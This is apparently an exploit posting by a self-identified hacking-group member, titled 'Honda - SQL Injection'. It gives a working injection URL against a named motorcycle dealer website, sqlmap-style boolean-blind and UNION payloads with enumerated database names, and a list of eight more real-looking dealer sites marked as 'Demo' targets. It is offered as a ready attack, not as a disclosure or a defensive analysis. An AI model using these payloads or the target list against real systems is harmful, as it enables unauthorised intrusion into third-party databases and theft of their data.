[+] Exploit Title: Honda - SQL Injection [+] Author: Hz3666Ghost [+] Contact me : t.me/Hz3666ghost [+] Thanx to : ======================= Indoghostsec - AnonGhost -Ghostsec - Anxsec Syndicate - Indonesian Fighter Cyber - Skullcybersec - rajawalisecteam - morrocanghost - and other ======================= [+] Exploit : http://www.superhonda.in/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports SUPERSALES_DB --- Parameter: id (GET) Type: boolean-based blind Title: HAVING boolean-based blind - WHERE, GROUP BY clause Payload: id=graziasport_01' HAVING 2323=2323-- uiHt&name=grazia125_sports Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-3968' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qbkbq','ycHfCYHnEQRMgvltdtwfktnmrBQRhJOlvYTPSLBU'),'qzkjq')-- enPH&name=grazia125_sports --- ....... [14:36:18] [INFO] resumed: 'supersales_db' available databases [2]: [*] information_schema [*] supersales_db ======================= [+] Demo : https://imperialhonda.in/model.php?id=grazia125_01&name=grazia_125 http://www.shitalhonda.in/model.php?id=grazia125_01&name=grazia_125 http://www.royalhonda.in/model.php?id=grazia125_01&name=grazia_125 http://www.superhonda.in/model.php?id=graziasport_01&name=grazia125_sports https://gandhihonda.com/model.php?id=grazia125_01&name=grazia_125 http://harikrishnahonda.com/model.php?id=graziasport_01&name=grazia125_sports https://anjalihonda.com/model.php?id=grazia125_01&name=grazia_125 http://anamikahonda.com/model.php?id=graziasport_01&name=grazia125_sports